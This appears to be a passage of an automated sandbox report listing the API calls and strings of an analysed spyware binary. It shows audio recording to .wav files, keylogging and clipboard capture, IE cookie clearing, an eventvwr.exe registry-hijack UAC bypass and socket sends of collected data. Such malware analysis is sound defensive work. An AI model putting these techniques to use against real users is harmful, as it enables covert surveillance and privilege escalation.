                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$G@2@@std@@G@std@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@Heap$??2@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeG@1@@TranslateV01@
                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                • API String ID: 2864085590-749203953
                                                • Opcode ID: 7b7e8488cc582310fffac7f2844346b6e6a38be584062e378a8ea1a5e3e3711c
                                                • Instruction ID: 9dc0e8f0f69231712d3938dd2f291ba0f5608cd30a61ea6cba1fa0a16a13e7a5
                                                • Opcode Fuzzy Hash: 7b7e8488cc582310fffac7f2844346b6e6a38be584062e378a8ea1a5e3e3711c
                                                • Instruction Fuzzy Hash: 67516171A00215ABCB05BFB5DC5D8EE7B7CEB44716B008476F602F21E1DB789A458B98
                                                APIs
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040194B
                                                • time.MSVCRT(?), ref: 00401963
                                                • localtime.MSVCRT(?), ref: 0040196D
                                                • strftime.MSVCRT ref: 00401982
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00401999
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,004191C8,0000005C,00000000,.wav), ref: 004019BF
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004019CC
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004019D9
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004019E5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004019EE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004019F7
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401A00
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401A09
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401A12
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419180,?,?,?,?,?,?,?,00000000,.wav), ref: 00401A21
                                                  • Part of subcall function 004016B9: CreateFileW.KERNEL32(00401A2D,40000000,00000000,00000000,00000002,00000080,00000000,?,00419180), ref: 0040171F
                                                • waveInUnprepareHeader.WINMM(00419180,00000020,?,?,?,?,?,?,00000000,.wav), ref: 00401A38
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401A43
                                                • waveInPrepareHeader.WINMM(00419180,00000020,?,?,?,?,?,?,00000000,.wav), ref: 00401A77
                                                • waveInAddBuffer.WINMM(00419180,00000020,?,?,?,?,?,?,00000000,.wav), ref: 00401A86
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                                • String ID: %Y-%m-%d %H.%M$.wav
                                                • API String ID: 4079669728-3597965672
                                                • Opcode ID: e063c5905416d0dbe44c7f481c18e9f1c4d86861447538576e38388ea8e43436
                                                • Instruction ID: ab5e3de388326a7a35f7dac87b9ba25e6a52d4b640695524d1efe7d84f6a5c4e
                                                • Opcode Fuzzy Hash: e063c5905416d0dbe44c7f481c18e9f1c4d86861447538576e38388ea8e43436
                                                • Instruction Fuzzy Hash: 09418A7184020ABFDB04EFA0EC5DADE7B7CEB14316F008476F506E61A4EB745A89CB59
                                                APIs
                                                • CreateFileW.KERNEL32(00401A2D,40000000,00000000,00000000,00000002,00000080,00000000,?,00419180), ref: 0040171F
                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,00419180), ref: 00401746
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,00419180), ref: 00401754
                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,00419180), ref: 00401763
                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,00419180), ref: 00401772
                                                • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,00419180), ref: 00401780
                                                • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,00419180), ref: 0040178E
                                                • WriteFile.KERNEL32(00000000,004191FA,00000002,00000010,00000000,?,00419180), ref: 0040179D
                                                • WriteFile.KERNEL32(00000000,004191FC,00000004,00000010,00000000,?,00419180), ref: 004017AC
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,00419180), ref: 004017BA
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,00419180), ref: 004017C8
                                                • WriteFile.KERNEL32(00000000,00419206,00000002,00000010,00000000,?,00419180), ref: 004017D7
                                                • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,00419180), ref: 004017E6
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,00419180), ref: 004017F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Write$Create
                                                • String ID: RIFF$WAVE$data$fmt
                                                • API String ID: 1602526932-4212202414
                                                • Opcode ID: 0ce33b44e164a9aa3a7e5645998a216147184dd4306f05d11505a37ad87fba25
                                                • Instruction ID: 22ebf2cd207699d837bc11439f4c6581057990142ceedffd1051dec651382149
                                                • Opcode Fuzzy Hash: 0ce33b44e164a9aa3a7e5645998a216147184dd4306f05d11505a37ad87fba25
                                                • Instruction Fuzzy Hash: 0F4101F654021C7ADB209F61DC85FEB7FBCEB85B50F008416BA06EA181D674D744CBA4
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,75920F00,00000000), ref: 00406B8A
                                                  • Part of subcall function 0040A87F: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040A8AE
                                                  • Part of subcall function 0040A87F: RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000000,?,00000400), ref: 0040A8CB
                                                  • Part of subcall function 0040A87F: RegCloseKey.ADVAPI32(80000002), ref: 0040A8D4
                                                  • Part of subcall function 0040A87F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040A8F3
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00406BB5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406BBE
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00406BCD
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies not found],?), ref: 00406BE8
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 00406C0E
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 00406C15
                                                • PathFileExistsA.SHLWAPI(?), ref: 00406C22
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00406C3B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406CEC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@V01@V01@@$Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@CloseD@2@@0@EnvironmentEventExistsExpandFileOpenPathQueryStringsV?$basic_string@Value
                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                • API String ID: 2836000926-4073444585
                                                • Opcode ID: 32045a73df500a43e2accbea536c45fd1ecb647eb105b40789e100ea343bd2c1
                                                • Instruction ID: 6ca23f0a21b17df671fbd93d2ed52a4360a3a4c9e74fe22fcc34686a8daba431
                                                • Opcode Fuzzy Hash: 32045a73df500a43e2accbea536c45fd1ecb647eb105b40789e100ea343bd2c1
                                                • Instruction Fuzzy Hash: B4415672904249ABDB00FFE4DD599EE7B7CEB14306F1080AAF502B3190DA399F49C769
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll,RtlGetNtVersionNumbers,00419970,00419BC8,00000000,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403022
                                                • GetProcAddress.KERNEL32(00000000), ref: 00403029
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403076
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 0040307F
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403089
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403094
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000), ref: 004030A5
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00419994,?), ref: 004030CA
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004030FA
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403107
                                                • exit.MSVCRT ref: 00403113
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040311C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403125
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@AddressExecuteG@1@@LibraryLoadProcShellexit
                                                • String ID: RtlGetNtVersionNumbers$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$ntdll$open$origmsc
                                                • API String ID: 2630578099-3715812343
                                                • Opcode ID: 84f2a4baa850f3925d098cf84792ce8ebd723e49b52ac0afd2516b53762b05f8
                                                • Instruction ID: b662692c131159cff8273747fd33031b7b3aab2cb8fdd887bb70e0aaef1a7605
                                                • Opcode Fuzzy Hash: 84f2a4baa850f3925d098cf84792ce8ebd723e49b52ac0afd2516b53762b05f8
                                                • Instruction Fuzzy Hash: FE2173B5540205BBDB05AFA09C9EEEF7F6CEB08717F008069F602A11D1DA785B85876D
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413A08,?,00000000,?,75A8C0D0,?), ref: 00405CB3
                                                • toupper.MSVCRT ref: 00405CC2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 00405CD6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00405CE1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405CFD
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D06
                                                • toupper.MSVCRT ref: 00405D99
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00405CEB
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D0F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D39
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D43
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D55
                                                • tolower.MSVCRT ref: 00405D72
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00405DF7
                                                Strings
                                                • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 00405D33
                                                • [End of clipboard text], xrefs: 00405D24
                                                • [Ctrl + , xrefs: 00405CCE
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                                • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                                • API String ID: 1567161615-398269065
                                                • Opcode ID: d0bc9d1c3441adfdd4f1f8ed1816ec3693c1403a484e7e23c6dd56fa6eb5b130
                                                • Instruction ID: 9adeee1e166fa2ba385a4033d536afdcce0fc1b978da8be5d6ab5f4b2a00cb68
                                                • Opcode Fuzzy Hash: d0bc9d1c3441adfdd4f1f8ed1816ec3693c1403a484e7e23c6dd56fa6eb5b130
                                                • Instruction Fuzzy Hash: C341B671904644BBDB15FBA8D8499FF7B78EF00301F14447FE442A31D1DA399B498B9A
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                • send.WS2_32(?,00000000), ref: 0040243B
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402447
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402451
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040246B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402475
                                                • send.WS2_32(?,00000000), ref: 0040247F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402489
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                                • String ID: [DataStart]$[INFO]
                                                • API String ID: 1403384299-3696159037
                                                • Opcode ID: dbe42062e35d414f9da2cb159815b1568958d3817d332a5520de37470e6872cf
                                                • Instruction ID: 5d8ce598d3c1e6d6ccf5cffaf713062e2c3c54cedef4e327da0b0d23e45d33b9
                                                • Opcode Fuzzy Hash: dbe42062e35d414f9da2cb159815b1568958d3817d332a5520de37470e6872cf
                                                • Instruction Fuzzy Hash: 8A21F576500109ABCB04EF90ED59AEE7B78EB18702F108179F903A61E1EF745F04CBA9
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401C64
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 00401C7C
